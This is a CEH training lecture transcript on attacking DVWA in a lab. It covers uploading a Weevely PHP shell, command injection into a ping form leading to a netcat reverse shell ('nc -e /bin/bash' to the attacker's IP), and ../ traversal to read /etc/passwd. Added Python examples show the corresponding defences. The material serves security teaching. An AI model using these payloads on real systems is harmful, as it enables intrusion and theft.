EC Council CEH 312-50 V11 – Website Hacking – File Upload, Code Execution & File Inclusion Vulns part 1
- Discovering & Exploiting File Upload Vulnerabilities To Hack Websites
In this lecture we’re going to look at file upload vulnerabilities. These are the simplest type to exploit, because the application lets us upload any type of file and then serves it back from the web root. So if the target server executes PHP, we can upload a PHP shell and get control of the server; if it executes Python, Ruby or another language, we upload a shell in that language instead. You can generate these shells with Veil-Evasion or Metasploit, or write your own. Today we’re going to look at a tool called Weevely, which generates password-protected PHP shells and lets us connect to them and do a number of useful things on the target once they are uploaded.
First of all, I have DVWA open here. When you pen test a website, what I recommend is that after you finish your information gathering, and before you reach for any tools, you browse the website manually: get a feel for it, see what’s installed and what features it exposes, and try to exploit those features. So let’s say you went through everything and reached the Upload page. This website lets us upload a file. In a real engagement this could be a profile picture upload, or a classifieds site that lets you attach photos of the car you’re selling. Any feature that accepts a file from the user is worth testing.
The page expects you to choose an image and upload it, so let’s try that first with the picture of a car from the resources. The upload succeeds and the page reports where the file was stored: the path starts with ../../, which means two directories back from the current page, followed by the upload directory and the file name. To confirm, strip the two directories (vulnerabilities and upload) from the current URL, append the path that was returned, and request it in the browser. The picture loads, so uploads land in a directory that the web server serves back to us.
That’s all good. Now let’s try to upload a PHP file. We’ll use Weevely to create the payload, which in this case is a PHP shell. You could use Metasploit to generate a PHP payload, as I said, but Weevely is designed specifically for web application penetration testing. The syntax is simple: the tool name, weevely, then generate because we want to generate a shell file, then a password so that only we can authenticate to the shell once it’s on the website, and finally where to store it.
My password is going to be 123456 and I’m going to store it in /root as shell.php, so the command is weevely generate 123456 /root/shell.php. I’m already in /root, so an ls shows the file. Now go back to the website and upload shell.php the same way we uploaded the picture. The page again reports that the upload was successful and that the file is in the same place as the picture.
Now we use the same link and connect to the shell with Weevely. First check that it’s actually there: browse to shell.php directly and you get a blank page rather than a 404, which means the file was uploaded and the server is executing it (a PHP file that was only being served as text would show its source instead). To connect we run weevely followed by the URL of the shell and the password, i.e. weevely http://<target>/dvwa/hackable/uploads/shell.php 123456.
This is similar to catching a connection with the Metasploit multi/handler, except that here we connect out to the backdoor we uploaded rather than waiting for it. We land in a Weevely prompt on the target’s file system. From here any Linux command is executed on the target and the result is shown to us: pwd shows /var/www/dvwa/hackable/uploads, id shows that we are running as www-data, the web server’s account, and uname -a confirms that this is the Metasploitable machine.
Now we can list files, change directories and run any Linux command we want, and the prompt updates to reflect where we are on the target. Weevely offers much more than a command prompt: type help to see its modules, which let you attempt privilege escalation, execute SQL queries against the site’s database, and do a number of other things designed for web application penetration testing. I’m going to leave it here; this shows how a file upload vulnerability is exploited: upload a file the server will execute, then talk to it.
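The upload page accepted shell.php because it checked nothing about the file. The following is an added example written for this page (not DVWA’s upload handler) of the server-side check that would have rejected it: one allowlisted extension, file signature read from the bytes rather than the client’s Content-Type, and a random server-side name. The allowlist, size limit and the signature table are assumptions chosen for the demo.

```python
# Added example (not DVWA's upload handler): a server-side upload check that would
# reject shell.php, shell.php.jpg and a .jpg containing PHP, and a store step that
# never reuses the client's file name. The allowlist, size limit and signature
# table are assumptions chosen for the demo.
import os
import secrets
import tempfile

# Allowed extension -> file signature(s) the content must start with.
ALLOWED_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for a profile picture


def client_name(filename):
    """Keep only the final path component; the client never chooses a directory."""
    return os.path.basename(filename.replace("\\", "/"))


def upload_problems(filename, data):
    """Return the reasons an upload must be rejected; an empty list means accept."""
    problems = []
    parts = client_name(filename).lower().split(".")
    # Exactly one extension, and it must be allowlisted: this rejects "shell.php",
    # ".htaccess" and double extensions such as "shell.php.jpg", which some Apache
    # AddHandler configurations still execute as PHP.
    if len(parts) != 2 or not parts[0]:
        problems.append("filename must be name.ext with exactly one extension")
        ext = None
    else:
        ext = parts[1]
        if ext not in ALLOWED_SIGNATURES:
            problems.append("extension %r is not an allowed image type" % ext)
    if len(data) > MAX_BYTES:
        problems.append("file exceeds the size limit")
    # Check the bytes, not the extension or the Content-Type header the client sent.
    if ext in ALLOWED_SIGNATURES and not data.startswith(ALLOWED_SIGNATURES[ext]):
        problems.append("content does not carry a %s signature" % ext)
    return problems


def save_upload(upload_dir, filename, data):
    """Validate, then write under a random name so the client cannot choose the path."""
    problems = upload_problems(filename, data)
    if problems:
        raise ValueError("; ".join(problems))
    ext = client_name(filename).lower().rsplit(".", 1)[-1]
    stored = os.path.join(upload_dir, "%s.%s" % (secrets.token_hex(16), ext))
    with open(stored, "wb") as f:
        f.write(data)
    return stored


def demo():
    """Run the check against constructed inputs; returns the stored file's base name."""
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 64          # constructed minimal JPEG header
    php_shell = b"<?php system($_GET['cmd']); ?>"       # constructed PHP one-liner
    upload_dir = tempfile.mkdtemp(prefix="uploads-")   # in practice: outside the web root
    for name, content in [("shell.php", php_shell), ("shell.php.jpg", jpeg), ("shell.jpg", php_shell)]:
        assert upload_problems(name, content), name      # each of these must be rejected
    return os.path.basename(save_upload(upload_dir, "car.jpg", jpeg))
```

Even with this check, the upload directory should live outside the web root (or have script execution disabled for it), because an image with PHP appended after a valid JPEG header passes the signature test; the random name and the no-execute directory are what stop that file from ever being run.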
- Discovering & Exploiting Code Execution Vulnerabilities To Hack Websites
Code execution vulnerabilities allow us to execute operating system commands on the target server. If the server runs Windows, we execute Windows commands; if it runs Linux, Linux commands. This is a critical issue because it lets us do anything the web server’s user can do on the machine. For example, we can download a PHP shell, a payload or anything else onto the server using the wget command; you just need to make sure you write it to a directory the web server’s user has permission to write to.
Another way of exploiting this vulnerability is to run OS commands that give us a reverse shell. Since we can run operating system commands, we can use whatever languages and tools are installed on the server to make a connection back to our computer. So let’s assume we’re browsing the site and reach a page that offers to ping a host. As always, experiment with every input box you see: work out what it does with your input and what you can inject into it. This box says it’s going to run a ping.
If I put in an IP, for example 10.20.14.203, which is my own machine, and submit, the page pings it and returns the ping output. So it looks like the server is running the ping command for us: we send 10.20.14.203, the web server runs ping 10.20.14.203 and returns the result. How can we exploit that if our input is simply placed into a command and executed?
In Unix shells the semicolon separates multiple commands on one line. If in my own terminal I run ls; pwd, the shell executes ls and then pwd, showing the directory listing followed by the working directory. We can try the same thing here: enter a valid IP, a semicolon, and then pwd, and see whether pwd is executed. If it is, we have a command injection vulnerability and can execute anything we want on the server.
I paste 10.20.14.203; pwd and submit. We get the ping results, and at the end we get the current working directory, /var/www/dvwa/vulnerabilities/exec. So the pwd was executed, which means any command we put there will be. In the resources I’ve included a file of one-liners for getting a reverse connection from a target; there are several, and each depends on a language or tool being present on the server: PHP, Ruby, Perl, Python, bash and netcat.
Bash is the standard Linux shell language, so the bash one-liner will work on most Unix-based systems, and most of them also have Python and netcat, so those are good options too. In this video we’re going to use netcat. First, just as we did with the Metasploit multi/handler, we listen for the incoming connection.
You could use multi/handler here as well, but I’ll keep it simpler with netcat, which is a tool for listening on and connecting to ports. We listen on port 8080 with nc -vv -l -p 8080: -vv gives verbose output so we can see what happens if anything goes wrong, and -l tells it to listen, on port 8080. Hit enter and it sits there listening.
Next we make the web server connect back to my machine, also with netcat, assuming netcat is installed on the server (it’s worth trying; if it isn’t, use one of the other one-liners). The command tells netcat to execute /bin/bash and connect to my attacker machine, 10.20.14.203, on port 8080, where we’re listening: nc -e /bin/bash 10.20.14.203 8080. We inject it exactly the way we injected pwd; previously we submitted 10.20.14.203; pwd.
So I replace pwd with that command, submit, and the web server tries to connect back to the Kali machine. Switching to the listener, we have a connection from 10.20.14.204, the target. pwd shows we have a shell there, ls lists files, id shows we’re www-data, and uname -a confirms we’re on Metasploitable. We can run any command we want on the target, which, as www-data, means everything the web server’s account can do.
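The ping box is vulnerable because the IP is pasted into a shell command string. The block below is an added example written for this page (not DVWA’s code) that reproduces that bug in Python next to the hardened version. echo stands in for ping so the demo runs offline without network access; the injection mechanics are identical. The hostname pattern is an assumed policy.

```python
# Added example (not DVWA's code): the ping box above reproduced in Python, next to
# a hardened version. `echo` stands in for `ping` so the demo runs offline without
# network access; the injection mechanics are the same.
import ipaddress
import re
import subprocess

# Plain hostname: labels of letters, digits and hyphens joined by dots (assumed policy).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)


def ping_vulnerable(target):
    """Single command string through the shell, as DVWA's exec page does with shell_exec().
    Everything after a ';', '|', '&&', '`' or '$(' in `target` is executed."""
    cmd = "echo pinging " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_argv_only(target):
    """No shell at all: the target is one argv entry, so '; pwd' reaches echo as data."""
    return subprocess.run(["echo", "pinging", target], capture_output=True, text=True).stdout


def is_valid_target(target):
    """Accept an IP literal or a plain hostname; anything carrying shell metacharacters fails."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(target))


def ping_hardened(target):
    """Both defences: validate the input, then pass it as an argument, never as shell text."""
    if not is_valid_target(target):
        raise ValueError("not a valid IP address or hostname: %r" % target)
    return ping_argv_only(target)
```

ping_vulnerable("10.20.14.203; pwd") returns the echo line followed by the working directory, exactly what DVWA showed. ping_argv_only with the same input prints the whole string, semicolon included, because no shell ever parses it; the validation in ping_hardened is the second layer, so that a host name containing something unexpected is refused rather than quietly passed along.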
- Discovering & Exploiting Local File Inclusion Vulnerabilities
Local file inclusion vulnerabilities allow you to read any file on the same server that the web server’s user can read, even files outside /var/www. This is critical because if the users or the application store sensitive files or password files on the server, you can read them and use what you find to exploit the target further. Also, if several websites share a server and you find this vulnerability on a site you’re not targeting, you may be able to read files belonging to the site you are targeting and attack it from there.
Let’s have a look. This time we’re going to exploit the vulnerability through the URL rather than a form field. In the code execution example we typed into a text box, but the same bug often shows up as a URL parameter: something like ?cmd= followed by a command, or ?ip=10.20.14.203;pwd for the ping example. The same applies to file inclusion. Here the URL has a page parameter, and it is loading something called include.php.
So the current page is loading another page, include.php. Again, you’d be browsing the site, getting a feel for it, and spotting things like this, just as you’d spot an ip= parameter and think of the ping in the previous video. Our target is trying to open a file called include.php, so let’s check that it exists: remove the rest of the path and request include.php directly. It does exist (it doesn’t render properly on its own, but it’s there) and it sits in the same working directory as the vulnerable page.
Now let’s try to read a file stored elsewhere on the server. We’ll use /etc/passwd, which lists every user account on the system along with its home directory and login shell. If I run cat /etc/passwd on my Kali machine, I see all the users on my own computer; we want the same file from the web server. First look at our current location: the vulnerable page lives in the fi directory, /var/www/dvwa/vulnerabilities/fi, five directories below the root of the file system. So we need to go back five directories and then into /etc/passwd.
Going back one directory is written ../, so we replace include.php in the page parameter with ../../../../../etc/passwd, one ../ for each of fi, vulnerabilities, dvwa, www and var. The page now shows the contents of /etc/passwd. Copy it out and save it; it tells you which accounts exist on the box and is useful for the rest of the engagement. You can use the same technique to read other sensitive files, or files belonging to other websites on the same server.
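To make the five ../ steps concrete, here is an added example written for this page (not DVWA’s include.php) that builds a fake /var/www/dvwa/vulnerabilities/fi tree and an /etc/passwd under a temporary directory, reproduces the vulnerable include, and shows the realpath check that closes it. The directory layout and the two passwd lines are constructed for the demo.

```python
# Added example (not DVWA's include.php): how the page parameter above resolves to
# /etc/passwd, and the realpath check that closes it. A fake root is built under a
# temp directory with constructed file contents so the demo runs offline.
import os
import tempfile

# Assumed to mirror the target: the include directory sits five levels below root.
FI_DIR = os.path.join("var", "www", "dvwa", "vulnerabilities", "fi")


def make_fake_root():
    """Create <tmp>/var/www/dvwa/vulnerabilities/fi/include.php and <tmp>/etc/passwd."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    os.makedirs(os.path.join(root, FI_DIR))
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, FI_DIR, "include.php"), "w") as f:
        f.write("<?php echo 'include page'; ?>\n")            # constructed stand-in
    with open(os.path.join(root, "etc", "passwd"), "w") as f:  # constructed two-line passwd
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "www-data:x:33:33:www-data:/var/www:/bin/sh\n")
    return root


def traversal_payload(depth=5):
    """The value submitted as ?page=: one ../ per directory between fi and /."""
    return "../" * depth + "etc/passwd"


def include_vulnerable(root, page):
    """Mirrors include($_GET['page']): the parameter is joined straight onto the
    include directory, so ../ sequences walk out of the web root."""
    with open(os.path.join(root, FI_DIR, page)) as f:
        return f.read()


def is_inside_include_dir(root, page):
    """Resolve symlinks and ../ first, then require the result to stay under the include dir."""
    base = os.path.realpath(os.path.join(root, FI_DIR))
    target = os.path.realpath(os.path.join(base, page))
    return os.path.commonpath([base, target]) == base


def include_hardened(root, page):
    """Refuse any page whose resolved path leaves the include directory."""
    if not is_inside_include_dir(root, page):
        raise PermissionError("page escapes the include directory: %r" % page)
    with open(os.path.realpath(os.path.join(root, FI_DIR, page))) as f:
        return f.read()
```

The check is done on the resolved path, not on the string, so it also catches a payload with more ../ than there are directories (the extra steps stop at /) and an absolute page value such as /etc/passwd, which os.path.join would otherwise substitute for the base directory. In production the page parameter would normally be restricted further to a fixed list of known include names.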